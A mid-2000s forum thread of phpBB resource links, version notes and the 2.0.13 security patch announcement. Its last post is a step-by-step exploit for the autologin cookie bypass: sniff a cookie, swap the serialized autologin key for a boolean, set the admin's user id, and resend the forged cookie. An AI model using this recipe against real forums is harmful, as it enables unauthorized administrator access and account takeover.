Usefull phpBB sites and info. [IMPORTANT UPDATE: 02-28-05]

[iGuest 3]

In this topic I will give some usefull sites and info.

I start with info because that is most important:

Info:
phpBB is under a GPL license. It is 100% free and it may be reselled (thanks abcde for the notification). You may also adjust it like whatever you want.

There are no problems with installing mods.

If you want to make a pre-hacked phpBB (phpBB with mods installed) and publish it you must ask permission to all authors of the mods you are using.

And ofcourse the most important one: DO NOT REMOVE THE COPYRIGHT.
If you do you will not get support at any phpBB site.
Also with some mods and styles there will be a copyright line added. You are also not allowed to remove this one. There is always someone to find out.

the latest version of phpBB is phpBB 2.0.13. the newest phpBB is in development but is downloadable as CVS (not reccomended). This is of version 2.1.2 with many new features and many bugs and you can't get support with it at any forums.

phpBB is also integraded in PHP-nuke. All templates can be used for phpBB PHP-nuke integration. However. Some mods can not be used by PHP-nuke phpBB like the mx portal, blend portal system, EZ portal and IM portal.

Important: phpBB 2.0.13 released!!!
phpBB 2.0.13 has just been released. Click here for more info. This is a very important update. Especialy for those who are using 2.0.12.

Sites:

Here are some usefull sites
 

phpBB sites:
phpBB main site
Dutch phpBB site
Germain phpBB site
Spanish phpBB site
French phpBB site
Italian phpBB site

phpBB mods sites:
phpBB hacks
phpBB2 mods database

phpBB mods author sites:
phpBB MosyMuis Modifications
IntegraMod
DB9
Smartor Site

phpBB styles:
phpBB hacks
Forum Images (creator of this thme)
PHP styles
phpBB design
Skaidon Designs (also IPB & VB styles)

Current Status
Latest release: phpBB 2.0.13
Under Development: phpBB 3.0.0 Olympus

The new phpBB!!! 3.0.0 Olympus
The first plan was just phpBB 2.1.2 and the final release would be 2.2.x.
Now phpBB decided to renumber it to 3.0.0. And the codename will be: Olympus. From 3.x.x. every phpBB version will have it's own codename.
The methodology of that requires the major number to change when backward compatibility is broken. That's the case with the new release. Not one style will work "as is", practically no Mods will function. Even the language file contents and structure are completely different.
An upgrade script will obviously be provided (and is currently in beta test) enabling you to upgrade your existing 2.x database to 3.0.0.

This is a list of all new features:
- New module system
- Warning System
- Report system
- Sub-forums and catergories
- Advanced user control panel
- File attachements
- Saving posts and pms so they can be posted later

Admin features:
- Adding custom profile fields (with multi-ple languages)
- Customizing message for when the board is not available
- Advanced style and permission module
- Adding custom BBcodes
- Adding forum bots
- Editing files in ACP
- And many many many more...

I just saw a question about the ACP. They are not stupid but questions like these are answerd at phpbb.com

Click here to see how to download phpBB 2.0.13 and why to install/upgrade it.

I hope this was enough. If you have questions. Then ask it here.

Updates:
02-28-05
- Added important info: phpBB 2.0.13
- Added one more link to a phpBB support site
02-22-05
- Added one more link under styles catergory
- Added info about how to download phpBB 2.0.12
01-25-05
- Added information phpBB 3.0.0
12-17-04
- Changed a line: phpBB 2.0.10 -> phpBB 2.0.11

12-14-04
- Added 3 support links
- Updated GPL info

12-08-04
- Added one link under mods author sites

11-28-04
- Added 2 more links
- Changed the info about reselling phpBB
- Added status phpBB
- Added phpBB PHP-nuke info

[iGuest 3]

thanks for the links they are very helpful

[iGuest 3]

http://forums.xisto.com/no_longer_exists/

You might wanna add this to your post :wink:

[iGuest 3]

http://forums.xisto.com/no_longer_exists/ (or was it .net)?

[iGuest 3]

Thank you. I will add it to my post

[iGuest 3]

I updated the info. I reccomend you to read about the new phpBB

[iGuest 3]

yeah I know it last 2 weeks...I think... :wink:

[iGuest 3]

thanks for sharing

[iGuest 3]

Important!!! phpBB 2.0.13 has just been released.

 

Hi everyone,  

 

phpBB Group announces the release of phpBB 2.0.13, the "Beware of the furries" edition. This release addresses two recent security exploits, one of them critical. They were reported a few days after .12 was released and no one is more annoyed than us, having to release a new version in such a short period of time.  

Fortunately both fixes are easy and in each case just one line needs to be edited.  

 

The first issue is critical (session handling allowing everyone gaining administrator rights) and we urge you to fix it on your forums as soon as possible:  

 

Open includes/sessions.php  

 

Find:  

if( $sessiondata['autologinid'] == $auto_login_key ) 

Replace with:  

if( $sessiondata['autologinid'] === $auto_login_key ) 

 

A second minor issue reported to bugtraq several days ago was the path disclosure bug in viewtopic.php which got fixed by applying the following steps:  

 

Open viewtopic.php  

 

Find:  

$message = str_replace('"', '"', substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#b(" . $highlight_match . ")b#i', '<span style="color:#" . $theme['fontcolor3'] . ""><b>1</b></span>', '')", '>' . $message . '<'), 1, -1));

Replace with:  

$message = str_replace('"', '"', substr(@preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "@preg_replace('#b(" . $highlight_match . ")b#i', '<span style="color:#" . $theme['fontcolor3'] . ""><b>1</b></span>', '')", '>' . $message . '<'), 1, -1));

 

 

 

As with all new releases we urge you to upgrade as soon as possible. You can of course find this download available on our downloads page. As per usual three packages are available to simplify your upgrade.

Be sure to do this all.

 

Download phpBB 2.0.13 (full package)

Download phpBB 2.0.13 (changed files only)

Download phpBB 2.0.13 (patch file only)

[iGuest 3]

This is what will happen if you don't upgrade to 2.0.13.

Use a data sniffer like etheral to find info like this:

GET / HTTP/1.1Host: freenukehosting.com
Cookie:?_data%3Da%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%225555aa38cc19f4d4cb6f2d012e1e50b2%22%3Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D%3B%20; ?_sid=15333b2aefc193190bebf619fd97cff1
Cache-Control: max-age=0

Decode it:

?_data%3Da%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A32%3A%225555aa38cc19f4d4cb6f2d012e1e50b2%22%3Bs%3A6%3A%22userid%22%3Bi%3A2%3B%7D%3B%20;

Part using a url decoder (http://meyerweb.com/eric/tools/dencoder/):

?_data=a:2:{s:11:"autologinid";s:32:"5555aa38cc19f4d4cb6f2d012e1e50b2";s:6:"userid";i:2;};

Replace:

s:32:"5555aa38cc19f4d4cb6f2d012e1e50b2"

with

b:1

It should look like :

?_data=a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";};

You can change the userid to the user you want to be, I don't have to explain the significance of that. (admin userid)

After that's done, decode it again and send your request with your faked cookie data. Of course, if you don't understand what I just posted, you'll be able to do nothing.